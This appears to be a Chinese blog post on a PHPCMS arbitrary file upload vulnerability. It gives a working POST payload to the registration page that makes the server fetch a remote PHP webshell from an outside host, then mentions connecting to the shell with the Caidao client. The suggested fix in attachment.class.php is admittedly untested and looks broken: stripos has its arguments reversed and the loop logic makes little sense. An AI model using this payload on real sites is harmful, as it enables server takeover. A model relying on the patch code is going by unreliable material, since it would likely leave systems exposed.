【注意：此文章为博主原创文章！转载需注意，请带原文链接，至少也要是txt格式！】

注意这个漏洞不知道是哪位朋友爆出来的，找不到来路。。我只是给了修复建议。
首先打开注册页面，然后向注册页面POST如下payload：

siteid=1&modelid=11&username=123456&password=123456&email=123456@qq.com&info[content]=<img src=http://xss.com/webshell//php_assert.php#.jpg>&dosubmit=1&protocol=

然后就会报错并返回shell地址：

PHPCMS最新版任意文件上传漏洞

然后就可以连接啦。

菜刀链接

这里说一下修复办法。。。因为本人也没有具体的环境，所以就算大概的给出这么一个方案吧。

打开phpcms\libs\classes\attachment.class.php

找到 168 行 也就是代码

$file_name = basename($file);

$filename = $this->getname($filename);

这个地方，下面加上如下代码。

1
2
3
4
5
6
7
8
9

if(!stripos($ext,$filename)){
    $arryfilename = explode("|", $ext);
    foreach($arryfilename as $n=>$fn){
                if($fn){
                       $filename = $fn;
                        continue;
                }
     }
}

就应该是可以了。